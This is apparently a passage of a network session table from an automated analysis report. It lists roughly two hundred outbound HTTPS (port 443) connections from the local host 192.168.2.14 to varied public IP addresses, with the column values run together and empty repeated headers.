                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12600192.168.2.1440944158.46.170.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12601192.168.2.145380236.67.98.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12602192.168.2.143986823.242.249.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12603192.168.2.1433858139.133.168.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12604192.168.2.1458582195.210.203.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12605192.168.2.1433588198.139.59.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12606192.168.2.1453054129.3.149.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12607192.168.2.1435090207.35.93.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12608192.168.2.1434796116.53.81.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12609192.168.2.14553968.40.182.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12610192.168.2.1436490175.169.182.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12611192.168.2.145064482.0.63.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12612192.168.2.144001677.120.163.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12613192.168.2.1456604183.83.153.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12614192.168.2.143671895.179.160.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12615192.168.2.1435416132.120.144.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12616192.168.2.14591742.238.223.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12617192.168.2.1443402104.55.79.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12618192.168.2.1459496168.173.12.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12619192.168.2.1452306198.98.172.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12620192.168.2.1442324167.163.228.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12621192.168.2.1459870217.170.245.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12622192.168.2.146085849.143.190.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12623192.168.2.1458950128.22.31.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12624192.168.2.14484985.247.235.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12625192.168.2.144545862.48.137.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12626192.168.2.143864845.218.92.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12627192.168.2.145667498.250.65.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12628192.168.2.1452642113.147.250.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12629192.168.2.1436876167.110.183.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12630192.168.2.14416948.252.207.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12631192.168.2.1456658140.233.194.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12632192.168.2.1442638110.44.180.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12633192.168.2.1433078191.159.24.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12634192.168.2.1441910213.170.4.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12635192.168.2.1450822153.248.189.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12636192.168.2.143938223.11.15.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12637192.168.2.14468645.212.14.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12638192.168.2.145445032.236.52.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12639192.168.2.1441862222.91.192.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12640192.168.2.1458000143.202.220.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12641192.168.2.143339252.86.21.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12642192.168.2.1443574180.136.157.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12643192.168.2.145483046.179.151.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12644192.168.2.1460918162.130.121.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12645192.168.2.1455046120.215.7.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12646192.168.2.1451890154.199.3.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12647192.168.2.145640243.76.245.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12648192.168.2.1455514185.134.251.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12649192.168.2.1446288151.169.204.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12650192.168.2.145900019.165.209.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12651192.168.2.1449044154.15.223.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12652192.168.2.143334666.29.191.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12653192.168.2.1438700119.65.64.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12654192.168.2.143502664.3.125.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12655192.168.2.144037270.188.11.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12656192.168.2.1433988155.118.13.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12657192.168.2.143347872.240.81.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12658192.168.2.144584075.35.248.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12659192.168.2.143941664.89.252.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12660192.168.2.145452853.240.122.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12661192.168.2.1449654165.150.61.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12662192.168.2.1435688178.78.177.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12663192.168.2.144304051.66.169.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12664192.168.2.143488280.237.27.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12665192.168.2.144274031.22.57.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12666192.168.2.1433980185.10.146.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12667192.168.2.14547429.153.223.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12668192.168.2.1441130159.66.244.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12669192.168.2.1443372191.54.2.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12670192.168.2.1443352102.183.208.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12671192.168.2.143766652.116.70.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12672192.168.2.143948647.11.111.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12673192.168.2.14348105.242.181.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12674192.168.2.1447216172.96.83.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12675192.168.2.1455620120.237.174.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12676192.168.2.1436614211.197.219.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12677192.168.2.1453080118.169.248.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12678192.168.2.1459598180.244.190.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12679192.168.2.143592431.127.138.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12680192.168.2.1436076146.166.238.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12681192.168.2.1435920181.227.162.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12682192.168.2.1441650195.180.6.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12683192.168.2.1459092191.108.205.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12684192.168.2.143362074.26.113.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12685192.168.2.1440116103.33.52.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12686192.168.2.1441382118.212.181.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12687192.168.2.143451668.75.44.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12688192.168.2.144192447.131.151.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12689192.168.2.1448050207.179.79.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12690192.168.2.145160677.53.157.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12691192.168.2.1435886217.7.15.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12692192.168.2.144049697.233.104.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12693192.168.2.145073631.243.126.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12694192.168.2.144032263.244.21.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12695192.168.2.144585843.251.74.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12696192.168.2.1446060204.246.214.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12697192.168.2.145766271.215.114.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12698192.168.2.1452306170.111.53.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12699192.168.2.145615632.97.27.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12700192.168.2.1449718119.39.61.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12701192.168.2.145633820.189.77.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12702192.168.2.1446760191.4.147.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12703192.168.2.146083638.72.204.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12704192.168.2.1434162124.48.50.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12705192.168.2.144769690.146.12.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12706192.168.2.144551664.180.158.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12707192.168.2.1441554197.108.134.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12708192.168.2.1439568147.152.144.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12709192.168.2.1434772193.203.133.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12710192.168.2.145617264.147.219.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12711192.168.2.1457232125.135.217.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12712192.168.2.143296891.230.211.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12713192.168.2.1434182101.241.200.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12714192.168.2.144627282.166.37.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12715192.168.2.144954831.210.238.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12716192.168.2.1438140151.37.249.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12717192.168.2.144588893.12.199.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12718192.168.2.144692818.69.29.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12719192.168.2.145847242.82.49.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12720192.168.2.1452254217.221.166.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12721192.168.2.143585836.163.87.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12722192.168.2.1453486137.30.21.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12723192.168.2.1445896184.171.28.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12724192.168.2.1434686119.206.116.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12725192.168.2.143720485.3.117.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12726192.168.2.14358161.6.56.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12727192.168.2.1443910106.162.83.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12728192.168.2.1436630190.46.83.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12729192.168.2.1440148217.112.153.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12730192.168.2.1441166105.42.197.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12731192.168.2.1444374112.174.162.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12732192.168.2.1458462172.196.174.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12733192.168.2.1449246117.180.147.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12734192.168.2.1434308179.253.113.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12735192.168.2.1432896123.103.163.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12736192.168.2.1449158136.161.70.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12737192.168.2.145709281.248.218.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12738192.168.2.14558585.15.53.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12739192.168.2.1444330126.76.177.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12740192.168.2.143857661.82.8.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12741192.168.2.1451474151.212.203.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12742192.168.2.143427846.216.82.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12743192.168.2.1450666150.89.198.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12744192.168.2.1455660149.206.11.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12745192.168.2.143455090.15.140.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12746192.168.2.1436382132.114.113.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12747192.168.2.1449894202.148.232.43443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12748192.168.2.1436102152.130.165.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12749192.168.2.145380424.118.162.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12750192.168.2.145809677.64.187.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12751192.168.2.1449612150.149.103.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12752192.168.2.144957684.100.209.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12753192.168.2.145633038.212.118.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12754192.168.2.1443636199.58.230.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12755192.168.2.1436580213.194.243.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12756192.168.2.144071493.201.232.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12757192.168.2.1460980207.114.98.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12758192.168.2.145930414.113.30.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12759192.168.2.1455722151.98.155.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12760192.168.2.145186447.235.168.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12761192.168.2.144198046.213.35.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12762192.168.2.14338089.143.203.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12763192.168.2.1436398150.54.13.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12764192.168.2.1454020202.31.208.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12765192.168.2.1460490185.71.18.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12766192.168.2.1458196129.113.76.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12767192.168.2.143533080.64.195.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12768192.168.2.143884492.62.197.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12769192.168.2.145252269.19.86.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12770192.168.2.1449786129.166.2.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12771192.168.2.145744476.147.39.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12772192.168.2.14497202.112.146.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12773192.168.2.144663073.140.91.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12774192.168.2.1456566162.239.98.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12775192.168.2.1442478216.82.29.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12776192.168.2.14432622.57.28.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12777192.168.2.1451716106.143.183.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12778192.168.2.1454060138.2.23.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12779192.168.2.145643458.103.245.123443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12780192.168.2.1445608126.81.188.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12781192.168.2.14442269.120.40.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12782192.168.2.1440212114.190.218.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12783192.168.2.1459074216.22.84.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12784192.168.2.144069247.189.191.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12785192.168.2.145699217.198.218.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12786192.168.2.1433282169.250.180.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12787192.168.2.143482041.1.39.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12788192.168.2.1457410130.9.28.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12789192.168.2.1447324111.9.203.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12790192.168.2.1436436206.239.186.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12791192.168.2.145225070.114.87.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12792192.168.2.143677640.251.53.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12793192.168.2.1443056126.52.62.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12794192.168.2.1439368176.255.9.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12795192.168.2.1455302167.86.87.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12796192.168.2.1450872108.159.100.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12797192.168.2.1441408158.137.108.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12798192.168.2.1449876171.114.233.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12799192.168.2.144005052.11.217.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12800192.168.2.144778624.220.192.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12801192.168.2.1460390155.189.8.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12802192.168.2.1447234103.100.95.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12803192.168.2.1456428211.245.239.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12804192.168.2.1450968173.168.153.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12805192.168.2.1459664166.74.34.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12806192.168.2.1440850130.247.169.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12807192.168.2.1436042204.193.46.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12808192.168.2.143395084.129.211.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12809192.168.2.1435894141.212.226.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12810192.168.2.144098466.193.20.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12811192.168.2.144508841.134.238.113443
                                                      TimestampBytes transferredDirectionData


